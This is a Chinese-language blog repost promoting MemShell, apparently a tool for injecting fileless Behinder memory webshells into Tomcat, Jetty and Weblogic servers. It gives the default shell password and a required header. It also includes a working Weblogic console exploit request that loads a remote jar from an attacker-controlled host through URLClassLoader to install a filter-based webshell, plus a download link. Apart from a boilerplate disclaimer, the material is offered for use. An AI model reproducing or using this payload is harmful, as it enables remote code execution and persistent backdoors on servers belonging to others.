冰蝎马注入工具 -- MemShell（3月18日更新）

adopi

原文链接：冰蝎马注入工具 -- MemShell（3月18日更新）
免责声明
请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01 工具介绍

支持常见中间件无文件落地冰蝎内存马注入&&文件上传代理冰蝎马注入。

0x02 安装与使用


冰蝎默认密码Crilwa，添加请请求头D0g3:xxx

1、代码执行，例如可以使用URLClassLoader远程程序添加加载类，便可以将无文件落入本地存储马。目前支持：

Tomcat6789回显，Tomcat6789冰蝎马
Jetty回显，Jetty冰蝎马
Weblogic冰蝎马
2、JavaAgent注册（需要文件落地，暂时只支持linux，目前没有实际冰蜘蛛payload，只支持Tomcat回显）

3、下面的payload，可以进行代码执行，加载远程恶意代码。

1. GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.net.URLClassLoader u = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("http://192.168.220.1:8000/MemShell-1.0-SNAPSHOT.jar")});u.loadClass("Inject.WeblogicInjectFilterShell").newInstance(); u.close();"); HTTP/1.1

复制代码

下载项目：https://github.com/cri1wa/MemShell